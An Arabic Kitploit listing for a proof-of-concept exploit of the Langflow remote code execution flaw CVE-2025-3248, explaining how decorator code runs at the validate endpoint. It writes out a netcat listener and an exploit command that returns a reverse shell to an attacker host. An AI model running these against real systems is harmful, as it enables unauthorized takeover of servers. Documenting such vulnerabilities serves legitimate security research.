Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-3248-Langflow-RCE — إثبات مفهوم لاستغلال CVE-2025-3248، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد دون مصادقة في Langflow، توضح حقن التعليمات البرمجية عبر نقطة النهاية /api/v1/validate/code. | Kitploit
أدوات/GitHubGitHub/hideki233/cve-2025-3248-langflow-rce
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubhideki233/cve-2025-3248-langflow-rce

CVE-2025-3248-Langflow-RCE

إثبات مفهوم لاستغلال CVE-2025-3248، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد دون مصادقة في Langflow، توضح حقن التعليمات البرمجية عبر نقطة النهاية /api/v1/validate/code.

عرض المستودع
2منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-3248 — تنفيذ التعليمات البرمجية عن بُعد غير المصادق عليه في Langflow

إثبات مفهوم لاستغلال CVE-2025-3248، وهو ثغرة تنفيذ تعليمات برمجية عن بُعد غير مصادق عليها في Langflow، وهي منصة لبناء سير عمل الذكاء الاصطناعي ونماذج اللغات الكبيرة.

  • الإصدارات المتأثرة: Langflow < 1.3.0
  • تم الإصلاح في: 1.3.0
  • فئة الثغرة: تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه (CWE-94، حقن تعليمات برمجية)
  • الحالة: تمت إضافتها إلى كتالوج الثغرات المستغلة المعروفة لدى CISA بعد رصد استغلالها في البرية من قبل شبكات الروبوتات.

السبب الجذري

يكشف Langflow عن نقطة نهاية، POST /api/v1/validate/code، مصممة "للتحقق" من مقتطف كود Python المُرسل من الواجهة (مثل كود المكونات المخصصة). داخليًا، يقوم بتحليل الكود وتجميعه باستخدام ast.parse() / compile() ويُبلغ عما إذا كان صالحًا — دون الحاجة إلى أي مصادقة.

الخلل: يقوم Python بتقييم تعبيرات الديكورات في وقت التحليل/التجميع، قبل استدعاء الدالة المزخرفة على الإطلاق. إذا كان "الكود المراد التحقق منه" المُرسل يحتوي على ديكور مثل:

root@kitploit:~
@exec("...كود خبيث...") def test(): pass

فإن استدعاء exec(...) يتم تنفيذه في اللحظة التي يُحلل فيها الكود — ولا يحتاج التحقق أبدًا إلى استدعاء test() فعليًا. وبالاقتران مع غياب المصادقة وغياب العزل، يكفي طلب HTTP واحد غير مصادق عليه لتنفيذ أوامر عشوائية على المضيف الذي يشغّل Langflow.

الاستخدام

  1. شغّل مستمعًا على جهازك:
    root@kitploit:~
    nc -lvnp 9001
    
  2. شغّل إثبات المفهوم ضد هدف:
    root@kitploit:~
    python3 exploit.py --target http://TARGET_IP:7860 --lhost YOUR_IP --lport 9001
    
  3. إذا كان الهدف عرضة للثغرة، ستحصل على شل على المستمع.
root@kitploit:~
usage: exploit.py [-h] --target TARGET --lhost LHOST [--lport LPORT] [--timeout TIMEOUT]

المتطلبات

root@kitploit:~
pip install requests

إخلاء المسؤولية

يُقدَّم هذا الكود لأغراض تعليمية ولاختبارات الأمان المصرح بها فقط (المختبرات، مسابقات CTF، والاختبارات بإذن كتابي صريح). لا تشغّل هذا ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن سوء الاستخدام.

المراجع

  • استشارة أمان Langflow GHSA-vwmf-pq79-vjvx
  • Horizon3.ai — Unsafe at Any Speed: Abusing Python Exec for Unauth RCE in Langflow AI
  • Keysight — CVE-2025-3248: Langflow Unauthenticated Code Validation
تنزيل الأداة